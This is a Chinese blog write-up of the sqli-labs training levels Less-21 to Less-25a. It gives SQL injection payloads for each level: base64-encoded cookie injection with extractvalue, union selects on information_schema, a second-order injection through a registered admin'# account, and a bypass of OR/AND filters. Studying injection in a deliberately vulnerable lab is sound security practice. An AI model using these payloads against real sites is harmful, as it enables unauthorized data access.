sqli-labs闯关记录(Less21-Less25)

本文记录了在sqli-labs中的Less-21到Less-25关卡的Cookie注入和错误注入攻击,涉及Base64加密的payload构造、双引号处理、无注释情况下的策略、二级注入概念以及如何绕过OR和AND过滤。通过这些挑战,展示了SQL注入的不同技术和实战技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Less-21 Cookie Injection- Error Based- complex - string

同样是cookie,不同的是使用base64加密
payload:abc')and extractvalue(0x7e,concat(0x7e,user(),0x7e))#
加密后:YWJjJylhbmQgZXh0cmFjdHZhbHVlKDB4N2UsY29uY2F0KDB4N2UsdXNlcigpLDB4N2UpKSM=
在这里插入图片描述

Less-22 Cookie Injection- Error Based- Double Quotes - string

payload:abc"and extractvalue(0x7e,concat(0x7e,database(),0x7e))#
加密后:YWJjImFuZCBleHRyYWN0dmFsdWUoMHg3ZSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpLDB4N2UpKSM=
在这里插入图片描述

Less-23 Error Based- no comments

payload:id=-1' union select 1,(database()),3'
在这里插入图片描述

payload:id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3'
在这里插入图片描述

Less-24 Second Degree Injections

现在数据库中并没有admin’#这个账户
在这里插入图片描述
在网站上注册了一个admin’#的账户
在这里插入图片描述

在这里插入图片描述

登录admin’#以后,修改密码,修改完成以后发现admin的密码被修改了。
在这里插入图片描述
大佬的解释:本关为二次排序注入的示范例。二次排序注入也成为存储型的注入,就是将可能导致 sql 注入的字符先存入到数据库中,当再次调用这个恶意构造的字符时,就可以出发 sql 注入。

Less-25 Trick with OR & AND

payload:id=1' || extractvalue(0x7e,concat(0x7e,database(),0x7e))-- +
题目提示了or和and被过滤
在这里插入图片描述

Less-25a Trick with OR & AND Blind

payload:-1 union select 1,(select group_concat(table_name)from infoorrmation_schema.tables where table_schema='security'),3%23
使用双写绕过代码的过滤
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值